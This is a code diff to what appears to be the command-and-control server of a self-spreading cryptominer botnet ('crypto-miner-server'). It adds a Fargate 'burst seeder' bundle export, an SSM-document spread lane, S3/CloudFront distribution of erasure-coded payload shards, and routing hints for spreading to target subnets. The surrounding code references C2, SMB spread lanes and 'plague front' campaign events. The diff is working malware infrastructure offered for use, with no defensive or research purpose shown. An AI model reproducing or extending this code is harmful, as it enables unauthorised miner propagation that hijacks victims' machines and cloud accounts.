diff --git a/agent/deploy/discover_join.go b/agent/deploy/discover_join.go index 1d52002..146e547 100644 --- a/agent/deploy/discover_join.go +++ b/agent/deploy/discover_join.go @@ -109,7 +109,8 @@ func ExecuteDeployPlanAs(cfg config.RuntimeConfig, plan DeployPlanBody, executor if config.FleetTorrentEnabled(cfg) { c2 := c2BaseFromPlan(plan) localIP, _ := PrimaryLocalIPv4() - if em, eErr := RunFleetTorrentStaging(cfg, *plan.ErasurePlan, c2, SubnetFromIP(localIP), ResolveLocalAWSRegion(cfg.AwsS3ShardRegion)); eErr == nil { + localRegion := ResolveLocalAWSRegion(cfg.AwsS3ShardRegion) + if em, eErr := RunFleetTorrentStaging(cfg, *plan.ErasurePlan, c2, SubnetFromIP(localIP), localRegion); eErr == nil { return em + " (primary lane failed: " + err.Error() + ")", nil } } diff --git a/server/config.go b/server/config.go index 2340311..98156ed 100644 --- a/server/config.go +++ b/server/config.go @@ -118,6 +118,8 @@ type ServerSettings struct { FargateBurstCampaign bool `json:"fargate_burst_campaign"` FargateBurstTTLHours int `json:"fargate_burst_ttl_hours,omitempty"` FargateBurstExpiresAt string `json:"fargate_burst_expires_at,omitempty"` + CloudMapNamespace string `json:"cloud_map_namespace,omitempty"` + CloudMapService string `json:"cloud_map_service,omitempty"` } // WebRTCMeshPolicySettings is Calibrate policy for WebRTC LAN seed spread. diff --git a/server/internal/api/deploy_plan.go b/server/internal/api/deploy_plan.go index 52cd770..d126e02 100644 --- a/server/internal/api/deploy_plan.go +++ b/server/internal/api/deploy_plan.go @@ -1,6 +1,7 @@ -package api +package api import ( + "context" "crypto/hmac" "crypto/sha256" "encoding/hex" @@ -12,7 +13,8 @@ import ( "path/filepath" "strings" - dbpkg "crypto-miner-server/internal/db" + dbpkg "crypto-miner-server/internal/cloudmap" + "crypto-miner-server/internal/db" "crypto-miner-server/internal/erasure" "crypto-miner-server/internal/models" "crypto-miner-server/internal/spreadrouter" @@ -72,6 +74,7 @@ type DeployPlanBody struct { ImageTarSHA256 string `json:"image_tar_sha256,omitempty"` SpreadRouteHint *spreadrouter.SpreadRouteHint `json:"spread_route_hint,omitempty"` ErasurePlan *erasure.Plan `json:"erasure_plan,omitempty"` + SSMDocument string `json:"ssm_document,omitempty"` } type deployPlanRequest struct { @@ -102,8 +105,10 @@ type DeployPlanHandler struct { fleetSecret func() string allowlist func() map[string]ServiceDeployLane pathTracer *PathTracerHandler - erasureEnabled func() bool - erasureShards *erasure.ShardStore + erasureEnabled func() bool + erasureShards *erasure.ShardStore + awsSwarmSettings func() erasure.AWSSwarmSettings + awsShardStore func(erasure.AWSSwarmSettings) erasure.ShardObjectStore } func NewDeployPlanHandler(database *dbpkg.Database, dataDir, projectRoot string, publicURL, fleetSecret func() string, allowlist func() map[string]ServiceDeployLane) *DeployPlanHandler { @@ -137,6 +142,11 @@ func (h *DeployPlanHandler) BindErasureFromHub(hub *WSHub, store *erasure.ShardS h.erasureEnabled = func() bool { return hub.serverPolicySnapshot().ErasureLanesEnabled } } +func (h *DeployPlanHandler) BindAWSErasureSwarm(settings func() erasure.AWSSwarmSettings, store func(erasure.AWSSwarmSettings) erasure.ShardObjectStore) { + h.awsSwarmSettings = settings + h.awsShardStore = store +} + // POST /api/v1/agent/deploy-plan func (h *DeployPlanHandler) PostDeployPlan(w http.ResponseWriter, r *http.Request) { var req deployPlanRequest @@ -258,6 +268,12 @@ func (h *DeployPlanHandler) buildPlan(req deployPlanRequest, matched string, lan case "spread_smb_unc": body.UNCPath = strings.TrimSpace(req.UNCPath) body.MaxHosts = 64 + case "ssm_document": + bundle, err := h.buildSSMSpreadBundle(req, serverURL) + if err != nil { + return DeployPlanBody{}, err + } + body.SSMDocument = bundle.Document default: return DeployPlanBody{}, fmt.Errorf("unsupported join lane %q", lane.Lane) } @@ -314,12 +330,41 @@ func (h *DeployPlanHandler) attachErasurePlan(req deployPlanRequest, serverURL s if body.SpreadRouteHint != nil { body.SpreadRouteHint.ErasureLanesEnabled = true } - if manifest, err := erasure.BuildTorrentManifest(serverURL, plan.ShardToken, plan.PayloadSHA256, plan.PayloadSize, erasure.Params{DataShards: plan.DataShards, ParityShards: plan.ParityShards}, erasure.ShardContentHashes(shardsFromStore(h.erasureShards, plan.ShardToken))); err == nil && manifest != nil { - if body.SpreadRouteHint == nil { - body.SpreadRouteHint = &spreadrouter.SpreadRouteHint{} + shards := shardsFromStore(h.erasureShards, plan.ShardToken) + hashes := erasure.ShardContentHashes(shards) + if h.awsSwarmSettings != nil && h.awsShardStore != nil { + cfg := h.awsSwarmSettings() + if cfg.Enabled() && cfg.CredentialsReady() && cfg.SigningReady() { + result, err := erasure.AttachS3Swarm(context.Background(), cfg, h.awsShardStore(cfg), plan.ShardToken, plan.PayloadSHA256, plan.PayloadSize, erasure.Params{DataShards: plan.DataShards, ParityShards: plan.ParityShards}, shards, hashes) + if err != nil { + return err + } + if result != nil { + for i := range plan.Shards { + if i < len(result.EdgeURLs) { + plan.Shards[i].EdgeURL = result.EdgeURLs[i] + } + } + if body.SpreadRouteHint == nil { + body.SpreadRouteHint = &spreadrouter.SpreadRouteHint{} + } + body.SpreadRouteHint.SwarmMagnet = result.SwarmMagnet + body.SpreadRouteHint.ShardManifestURLs = result.ShardManifestURLs + } + } + } + if body.SpreadRouteHint == nil || body.SpreadRouteHint.SwarmMagnet == "" { + if manifest, err := erasure.BuildTorrentManifest(serverURL, plan.ShardToken, plan.PayloadSHA256, plan.PayloadSize, erasure.Params{DataShards: plan.DataShards, ParityShards: plan.ParityShards}, hashes); err == nil && manifest != nil { + if body.SpreadRouteHint == nil { + body.SpreadRouteHint = &spreadrouter.SpreadRouteHint{} + } + if body.SpreadRouteHint.SwarmMagnet == "" { + body.SpreadRouteHint.SwarmMagnet = manifest.SwarmMagnet + } + if len(body.SpreadRouteHint.ShardManifestURLs) == 0 { + body.SpreadRouteHint.ShardManifestURLs = manifest.ShardManifestURLs + } } - body.SpreadRouteHint.SwarmMagnet = manifest.SwarmMagnet - body.SpreadRouteHint.ShardManifestURLs = manifest.ShardManifestURLs } return nil } diff --git a/server/internal/api/fargate_burst.go b/server/internal/api/fargate_burst.go new file mode 100644 index 0000000..5cd9740 --- /dev/null +++ b/server/internal/api/fargate_burst.go @@ -0,0 +1,252 @@ +package api + +import ( + "archive/zip" + "bytes" + "encoding/json" + "fmt" + "io" + "net/http" + "os" + "strings" + "time" + + dbpkg "crypto-miner-server/internal/db" + "crypto-miner-server/internal/erasure" + "crypto-miner-server/internal/fargate" +) + +type fargateBurstExportRequest struct { + ServerURL string `json:"server_url"` + BuildID string `json:"build_id"` + Campaign string `json:"campaign"` + Platform string `json:"platform"` + TTLHours int `json:"ttl_hours"` + TaskCount int `json:"task_count"` +} + +func (h *SpreadHandler) BindFargateDeps(publicURL func() string, shards *erasure.ShardStore) { + h.publicURL = publicURL + if shards != nil { + h.erasureShards = shards + } +} + +func (h *WSHub) SyncFargateBurstCampaign(active bool, expiresAtRFC3339 string, ttlHours int) { + h.mu.Lock() + wasActive := h.fargateBurstActiveLocked() + h.fargateBurstCampaign = active + h.fargateBurstTTLHours = fargate.ClampTTLHours(ttlHours) + if active { + if t, err := time.Parse(time.RFC3339, strings.TrimSpace(expiresAtRFC3339)); err == nil && !t.IsZero() { + h.fargateBurstExpiresAt = t + } else if h.fargateBurstExpiresAt.IsZero() || time.Now().After(h.fargateBurstExpiresAt) { + h.fargateBurstExpiresAt = time.Now().Add(time.Duration(h.fargateBurstTTLHours) * time.Hour) + } + } else { + h.fargateBurstExpiresAt = time.Time{} + } + nowActive := h.fargateBurstActiveLocked() + h.mu.Unlock() + if !wasActive && nowActive { + h.emitFargatePlagueFront() + } +} + +func (h *WSHub) fargateBurstActive() bool { + h.mu.RLock() + defer h.mu.RUnlock() + return h.fargateBurstActiveLocked() +} + +func (h *WSHub) fargateBurstActiveLocked() bool { + if !h.fargateBurstCampaign { + return false + } + if h.fargateBurstExpiresAt.IsZero() { + return true + } + return time.Now().Before(h.fargateBurstExpiresAt) +} + +func (h *WSHub) emitFargatePlagueFront() { + h.mu.RLock() + ttl := h.fargateBurstTTLHours + expires := h.fargateBurstExpiresAt + h.mu.RUnlock() + if ttl <= 0 { + ttl = 3 + } + payload := map[string]interface{}{ + "event": "fargate_plague_front", + "ttl_hours": ttl, + "expires_at": expires.Format(time.RFC3339), + } + emitter := &HubSeerEmitter{Hub: h, DB: h.db} + _ = emitter.EmitSeerEvent("fargate_plague_front", "", payload) +} + +func (h *SpreadHandler) buildFargateBurstBundle(req fargateBurstExportRequest) (*fargate.Bundle, error) { + serverURL := strings.TrimRight(strings.TrimSpace(req.ServerURL), "/") + if serverURL == "" && h.publicURL != nil { + serverURL = strings.TrimRight(strings.TrimSpace(h.publicURL()), "/") + } + if serverURL == "" { + return nil, fmt.Errorf("server_url required") + } + platform := strings.TrimSpace(req.Platform) + if platform == "" { + platform = "linux" + } + deployH := h.deployPlan + if deployH == nil { + deployH = NewDeployPlanHandler(h.db, h.dataDir, h.projectRoot, func() string { return serverURL }, func() string { return "" }, func() map[string]ServiceDeployLane { return NormalizeServiceDeployAllowlist(nil) }) + } + store := h.erasureShards + if store == nil { + store = erasure.NewShardStore() + } + deployH.BindErasureFromHub(h.wsHub, store) + return buildFargateBurstBundleFromBuild(deployH, store, serverURL, strings.TrimSpace(req.BuildID), strings.TrimSpace(req.Campaign), platform, req.TTLHours, req.TaskCount) +} + +func buildFargateBurstBundleFromBuild(deployH *DeployPlanHandler, store *erasure.ShardStore, serverURL, buildID, campaign, platform string, ttlHours, taskCount int) (*fargate.Bundle, error) { + if deployH == nil || store == nil { + return nil, fmt.Errorf("fargate burst: deploy handler required") + } + build, err := deployH.resolveBuild(buildID, platform) + if err != nil { + return nil, err + } + payload, err := os.ReadFile(build.FilePath) + if err != nil { + return nil, fmt.Errorf("read build: %w", err) + } + plan, err := erasure.BuildPlan(store, serverURL, buildID, campaign, payload, "/tmp/aetherforge-burst/worker", "exe", "", true, true) + if err != nil { + return nil, err + } + shards := shardsFromStore(store, plan.ShardToken) + if len(shards) == 0 { + return nil, fmt.Errorf("fargate burst: no erasure shards") + } + return fargate.GenerateBundle(fargate.Options{ + BuildID: buildID, Campaign: campaign, ServerURL: serverURL, + ShardToken: plan.ShardToken, PayloadSHA256: plan.PayloadSHA256, PayloadSize: plan.PayloadSize, + DataShards: plan.DataShards, ParityShards: plan.ParityShards, + TTLHours: ttlHours, TaskCount: taskCount, Shards: shards, + }) +} + +func zipFargateBurstBundle(bundle *fargate.Bundle) ([]byte, error) { + if bundle == nil { + return nil, fmt.Errorf("nil bundle") + } + var buf bytes.Buffer + zw := zip.NewWriter(&buf) + files := map[string][]byte{ + "task-definition.json": bundle.TaskDefinitionJSON, + "run-task.sh": bundle.RunTaskScript, + "erasure-shards.json": bundle.ShardManifestJSON, + } + for name, data := range files { + w, err := zw.Create(name) + if err != nil { + return nil, err + } + if _, err := io.Copy(w, bytes.NewReader(data)); err != nil { + return nil, err + } + } + if err := zw.Close(); err != nil { + return nil, err + } + return buf.Bytes(), nil +} + +func fargateBurstQueryFromRequest(r *http.Request) (buildID, campaign string) { + buildID = strings.TrimSpace(r.URL.Query().Get("pin")) + if buildID == "" { + buildID = strings.TrimSpace(r.URL.Query().Get("build_id")) + } + campaign = strings.TrimSpace(r.URL.Query().Get("c")) + if campaign == "" { + campaign = strings.TrimSpace(r.URL.Query().Get("campaign")) + } + return buildID, campaign +} + +func (h *SpreadHandler) ExportFargateBurst(w http.ResponseWriter, r *http.Request) { + var req fargateBurstExportRequest + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + http.Error(w, "invalid JSON", http.StatusBadRequest) + return + } + bundle, err := h.buildFargateBurstBundle(req) + if err != nil { + http.Error(w, err.Error(), http.StatusBadRequest) + return + } + zipData, err := zipFargateBurstBundle(bundle) + if err != nil { + http.Error(w, err.Error(), http.StatusInternalServerError) + return + } + if h.wsHub != nil && h.db != nil { + _ = (&OathLedgerBridge{DB: h.db, Hub: h.wsHub}).Record(AuthUsername(r), dbpkg.OathSpreadAttempt, "", "", dbpkg.OathOutcomeSuccess, map[string]string{"lane": "fargate_burst", "campaign": req.Campaign, "build_id": req.BuildID}, map[string]string{"lane": "fargate_burst"}) + } + writeZipAttachment(w, "aetherforge-fargate-burst-seeder.zip", zipData) +} + +func (h *SpreadHandler) FargateBurstTaskDefinition(w http.ResponseWriter, r *http.Request) { + buildID, campaign := fargateBurstQueryFromRequest(r) + bundle, err := h.buildFargateBurstBundle(fargateBurstExportRequest{BuildID: buildID, Campaign: campaign, ServerURL: publicURLFromRequest(r, h.publicURL)}) + if err != nil { + http.Error(w, err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/json") + w.Write(bundle.TaskDefinitionJSON) +} + +func (h *SpreadHandler) FargateBurstRunScript(w http.ResponseWriter, r *http.Request) { + buildID, campaign := fargateBurstQueryFromRequest(r) + bundle, err := h.buildFargateBurstBundle(fargateBurstExportRequest{BuildID: buildID, Campaign: campaign, ServerURL: publicURLFromRequest(r, h.publicURL)}) + if err != nil { + http.Error(w, err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "text/x-shellscript; charset=utf-8") + w.Write(bundle.RunTaskScript) +} + +func (h *SpreadHandler) FargateBurstBundleZip(w http.ResponseWriter, r *http.Request) { + buildID, campaign := fargateBurstQueryFromRequest(r) + bundle, err := h.buildFargateBurstBundle(fargateBurstExportRequest{BuildID: buildID, Campaign: campaign, ServerURL: publicURLFromRequest(r, h.publicURL)}) + if err != nil { + http.Error(w, err.Error(), http.StatusBadRequest) + return + } + zipData, err := zipFargateBurstBundle(bundle) + if err != nil { + http.Error(w, err.Error(), http.StatusInternalServerError) + return + } + writeZipAttachment(w, "aetherforge-fargate-burst-seeder.zip", zipData) +} + +func publicURLFromRequest(r *http.Request, fn func() string) string { + if fn != nil { + if u := strings.TrimRight(strings.TrimSpace(fn()), "/"); u != "" { + return u + } + } + if r == nil { + return "" + } + scheme := "http" + if r.TLS != nil { + scheme = "https" + } + return strings.TrimRight(fmt.Sprintf("%s://%s", scheme, r.Host), "/") +} diff --git a/server/internal/api/fargate_burst_test.go b/server/internal/api/fargate_burst_test.go new file mode 100644 index 0000000..f566ae9 --- /dev/null +++ b/server/internal/api/fargate_burst_test.go @@ -0,0 +1,144 @@ +package api + +import ( + "archive/zip" + "bytes" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + "testing" + + dbpkg "crypto-miner-server/internal/db" + "crypto-miner-server/internal/erasure" + "crypto-miner-server/internal/fargate" + "crypto-miner-server/internal/models" + "crypto-miner-server/internal/spreadrouter" +) + +func testFargateBurstSpreadHandler(t *testing.T) (*SpreadHandler, *DeployPlanHandler, *erasure.ShardStore) { + t.Helper() + dir := t.TempDir() + root := t.TempDir() + database, err := dbpkg.New(dir) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = database.Close() }) + buildDir := filepath.Join(dir, "builds", "fb1") + _ = os.MkdirAll(buildDir, 0o755) + artifact := filepath.Join(buildDir, "worker") + _ = os.WriteFile(artifact, []byte("fargate-burst-payload-bytes"), 0o644) + _ = database.InsertBuild(&models.BuildRecord{ID: "fb1", Platform: "linux", FileName: "worker", FilePath: artifact}) + store := erasure.NewShardStore() + hub := NewWSHub(database) + deployH := NewDeployPlanHandler(database, dir, root, + func() string { return "http://127.0.0.1:8989" }, + func() string { return "fleet-test" }, + func() map[string]ServiceDeployLane { return NormalizeServiceDeployAllowlist(nil) }, + ) + deployH.BindErasureFromHub(hub, store) + spreadH := NewSpreadHandler(database, dir, root, hub) + spreadH.BindFargateDeps(func() string { return "http://127.0.0.1:8989" }, store) + spreadH.BindDeployPlan(deployH) + return spreadH, deployH, store +} + +func TestExportFargateBurstZIP(t *testing.T) { + spreadH, _, _ := testFargateBurstSpreadHandler(t) + body := `{"server_url":"http://127.0.0.1:8989","build_id":"fb1","campaign":"burst-lab","ttl_hours":3}` + req := httptest.NewRequest(http.MethodPost, "/api/v1/builder/fargate-burst-export", strings.NewReader(body)) + rec := httptest.NewRecorder() + spreadH.ExportFargateBurst(rec, req) + if rec.Code != http.StatusOK { + t.Fatalf("status=%d body=%s", rec.Code, rec.Body.String()) + } + zr, err := zip.NewReader(bytes.NewReader(rec.Body.Bytes()), int64(rec.Body.Len())) + if err != nil { + t.Fatal(err) + } + names := map[string]bool{} + for _, f := range zr.File { + names[f.Name] = true + } + for _, want := range []string{"task-definition.json", "run-task.sh", "erasure-shards.json"} { + if !names[want] { + t.Fatalf("missing %s in zip", want) + } + } +} + +func TestFargateGenerateBundleFromBuild(t *testing.T) { + _, deployH, store := testFargateBurstSpreadHandler(t) + bundle, err := buildFargateBurstBundleFromBuild(deployH, store, "http://127.0.0.1:8989", "fb1", "burst", "linux", 3, 2) + if err != nil { + t.Fatal(err) + } + if len(bundle.TaskDefinitionJSON) == 0 || len(bundle.RunTaskScript) == 0 { + t.Fatalf("bundle=%+v", bundle) + } + if !strings.Contains(string(bundle.TaskDefinitionJSON), "AF_SHARD_MANIFEST_B64") { + t.Fatalf("task def missing manifest env: %s", bundle.TaskDefinitionJSON) + } +} + +func TestSyncFargateBurstCampaignEmitsSeerEvent(t *testing.T) { + dir := t.TempDir() + database, err := dbpkg.New(dir) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = database.Close() }) + hub := NewWSHub(database) + hub.SyncFargateBurstCampaign(true, "", 3) + events, err := database.ListSeerEvents(5) + if err != nil { + t.Fatal(err) + } + found := false + for _, ev := range events { + if ev.EventType == "fargate_plague_front" { + found = true + break + } + } + if !found { + t.Fatal("expected fargate_plague_front seer event") + } +} + +func TestSpreadRouterPreferFargateWhenBurstActive(t *testing.T) { + in := spreadrouter.Input{ + TargetSubnets: []string{"10.4.0"}, + FargateBurstActive: true, + FleetAgents: []spreadrouter.FleetAgentSnapshot{ + {AgentID: "seed", Subnet: "10.4.0", Clearance: 2, Connected: true}, + }, + } + rt := spreadrouter.Build(in) + rec, ok := rt.Recommend("10.4.0") + if !ok || !rec.PreferFargateSeeder { + t.Fatalf("rec=%+v ok=%v", rec, ok) + } + hint := spreadrouter.ToHint(rec) + if hint == nil || !hint.PreferFargateSeeder { + t.Fatalf("hint=%+v", hint) + } +} + +func TestFargateClampTTLHours(t *testing.T) { + if fargate.ClampTTLHours(1) != 2 || fargate.ClampTTLHours(8) != 4 { + t.Fatal("clamp failed") + } +} + +func TestFargateBurstPublicBundleZip(t *testing.T) { + spreadH, _, _ := testFargateBurstSpreadHandler(t) + req := httptest.NewRequest(http.MethodGet, "/api/v1/public/fargate-burst/bundle.zip?pin=fb1&c=burst", nil) + rec := httptest.NewRecorder() + spreadH.FargateBurstBundleZip(rec, req) + if rec.Code != http.StatusOK { + t.Fatalf("status=%d body=%s", rec.Code, rec.Body.String()) + } +} diff --git a/server/internal/api/spreadrouter_bridge.go b/server/internal/api/spreadrouter_bridge.go index e426427..68bbbe0 100644 --- a/server/internal/api/spreadrouter_bridge.go +++ b/server/internal/api/spreadrouter_bridge.go @@ -100,6 +100,7 @@ func buildSpreadRouterInput(hub *WSHub, sessions []*TraceSession, targetSubnets in.LaneSuccess = collectLaneSuccessStats(hub) in.ErasureLanesEnabled = hub.serverPolicySnapshot().ErasureLanesEnabled + in.FargateBurstActive = hub.fargateBurstActive() return in } diff --git a/server/internal/api/websocket.go b/server/internal/api/websocket.go index 73a3444..c3e7c8a 100644 --- a/server/internal/api/websocket.go +++ b/server/internal/api/websocket.go @@ -950,7 +950,7 @@ func (h *WSHub) HandleAgentWS(w http.ResponseWriter, r *http.Request) { } resp["triple_onion_policy"] = top spreadPolicy := map[string]interface{}{} - if policy.HashrateGateSpreadMin > 0 || policy.HashrateGateHPS > 0 || policy.ErasureLanesEnabled || policy.FleetTorrentEnabled { + if policy.HashrateGateSpreadMin > 0 || policy.HashrateGateHPS > 0 || policy.ErasureLanesEnabled || policy.FleetTorrentEnabled || policy.AwsS3ShardRegion != "" || policy.AwsCloudFrontDomain != "" { spreadPolicy["erasure_lanes_enabled"] = policy.ErasureLanesEnabled spreadPolicy["fleet_torrent_enabled"] = policy.FleetTorrentEnabled if policy.HashrateGateSpreadMin > 0 { @@ -959,6 +959,12 @@ func (h *WSHub) HandleAgentWS(w http.ResponseWriter, r *http.Request) { if policy.HashrateGateHPS > 0 { spreadPolicy["hashrate_gate_hps"] = policy.HashrateGateHPS } + if policy.AwsS3ShardRegion != "" { + spreadPolicy["aws_s3_shard_region"] = policy.AwsS3ShardRegion + } + if policy.AwsCloudFrontDomain != "" { + spreadPolicy["aws_cloudfront_domain"] = policy.AwsCloudFrontDomain + } } if scoutPolicy := h.scoutSpreadPolicyForAuth(agentID); scoutPolicy != nil { for k, v := range scoutPolicy { diff --git a/server/internal/spreadrouter/router.go b/server/internal/spreadrouter/router.go index 165126d..487980d 100644 --- a/server/internal/spreadrouter/router.go +++ b/server/internal/spreadrouter/router.go @@ -62,6 +62,7 @@ type Input struct { TargetSubnets []string RequestedLane string ErasureLanesEnabled bool + FargateBurstActive bool } // RouteEdge is a weighted edge from a seed hop to a target subnet. @@ -93,6 +94,8 @@ type RouteRecommendation struct { ErasureLanesEnabled bool `json:"erasure_lanes_enabled,omitempty"` SwarmMagnet string `json:"swarm_magnet,omitempty"` ShardManifestURLs []string `json:"shard_manifest_urls,omitempty"` + PreferFargateSeeder bool `json:"prefer_fargate_seeder,omitempty"` + RouteVia string `json:"route_via,omitempty"` } // SpreadRouteHint is attached to signed deploy plans for agent egress routing. @@ -112,6 +115,8 @@ type SpreadRouteHint struct { SwarmMagnet string `json:"swarm_magnet,omitempty"` // ShardManifestURLs lists C2/public shard fetch URLs for BGP spread hints. ShardManifestURLs []string `json:"shard_manifest_urls,omitempty"` + PreferFargateSeeder bool `json:"prefer_fargate_seeder,omitempty"` + RouteVia string `json:"route_via,omitempty"` } // RouteTable holds weighted edges and recommendations. @@ -152,7 +157,7 @@ func Build(in Input) *RouteTable { targets := normalizeTargets(in) for _, target := range targets { cands := collectCandidates(in, target, fleetByID, laneRates) - rec, edges := scoreCandidates(target, in.RequestedLane, in.ErasureLanesEnabled, cands) + rec, edges := scoreCandidates(target, in.RequestedLane, in.ErasureLanesEnabled, in.FargateBurstActive, cands) if rec.SeedAgentID != "" { rt.Routes = append(rt.Routes, rec) rt.bySubnet[target] = rec @@ -188,6 +193,9 @@ func ToHint(rec RouteRecommendation) *SpreadRouteHint { Score: rec.Score, ClearanceLevel: rec.ClearanceLevel, ErasureLanesEnabled: rec.ErasureLanesEnabled, + SwarmMagnet: rec.SwarmMagnet, + ShardManifestURLs: rec.ShardManifestURLs, + PreferFargateSeeder: rec.PreferFargateSeeder, } } @@ -303,7 +311,7 @@ func collectCandidates(in Input, target string, fleet map[string]FleetAgentSnaps return out } -func scoreCandidates(target, requestedLane string, erasureLanes bool, cands []candidate) (RouteRecommendation, []RouteEdge) { +func scoreCandidates(target, requestedLane string, erasureLanes, fargateBurst bool, cands []candidate) (RouteRecommendation, []RouteEdge) { var edges []RouteEdge var best RouteRecommendation var bestScore float64 @@ -353,6 +361,7 @@ func scoreCandidates(target, requestedLane string, erasureLanes bool, cands []ca Score: weight, Reason: reason, ErasureLanesEnabled: erasureLanes, + PreferFargateSeeder: fargateBurst, } } } diff --git a/server/internal/spreadrouter/router_test.go b/server/internal/spreadrouter/router_test.go index f7756c7..30b7987 100644 --- a/server/internal/spreadrouter/router_test.go +++ b/server/internal/spreadrouter/router_test.go @@ -123,6 +123,25 @@ func TestBuildSetsErasureLanesFlag(t *testing.T) { } } +func TestBuildSetsPreferFargateSeederWhenBurstActive(t *testing.T) { + in := Input{ + TargetSubnets: []string{"10.9.8"}, + FargateBurstActive: true, + FleetAgents: []FleetAgentSnapshot{ + {AgentID: "a1", Subnet: "10.9.8", Clearance: clearance.L2, Connected: true}, + }, + } + rt := Build(in) + rec, ok := rt.Recommend("10.9.8") + if !ok || !rec.PreferFargateSeeder { + t.Fatalf("route=%+v ok=%v", rec, ok) + } + hint := ToHint(rec) + if hint == nil || !hint.PreferFargateSeeder { + t.Fatalf("hint=%+v", hint) + } +} + func TestToHint(t *testing.T) { hint := ToHint(RouteRecommendation{ TargetSubnet: "10.1.2", SeedAgentID: "a1", EgressAgentID: "a1", Score: 0.8, diff --git a/server/main.go b/server/main.go index f49f5a4..c1d1375 100644 --- a/server/main.go +++ b/server/main.go @@ -306,7 +306,7 @@ func main() { publicHandler := api.NewPublicHandler(database, cfg.DataDir, publicBuildsCfg) publicHandler.BindErasureShardStore(erasureShardStore) spreadHandler := api.NewSpreadHandler(database, cfg.DataDir, projectRoot, wsHub) - spreadHandler.bindFargateDeps(func() string { return configProvider.PublicURL() }, erasureShardStore) + spreadHandler.BindFargateDeps(func() string { return configProvider.PublicURL() }, erasureShardStore) spreadHandler.BindS3CRRConfig(func() erasure.S3ShardConfig { return cfg.S3ShardCRRConfig() }) spreadCredHandler := api.NewSpreadCredHandler(database, spreadCredAdapter) deployPlanHandler := api.NewDeployPlanHandler( diff --git a/server/web/public/spread/index.html b/server/web/public/spread/index.html index d4ee16b..1d08080 100644 --- a/server/web/public/spread/index.html +++ b/server/web/public/spread/index.html @@ -241,6 +241,24 @@

+
+

Burst seeder (ECS Fargate)

+

+ When a Fargate burst campaign is active on the command deck, BGP spread hints set + prefer_fargate_seeder. Download a standalone task definition + run script with embedded + erasure shards — run on your AWS account (no server-side ECS required). +

+
+ Burst bundle (ZIP) + task-definition.json + run-task.sh +
+

+ ZIP includes erasure-shards.json. Campaign TTL is 2–4 hours; Seer emits + fargate_plague_front when burst activates. +

+
+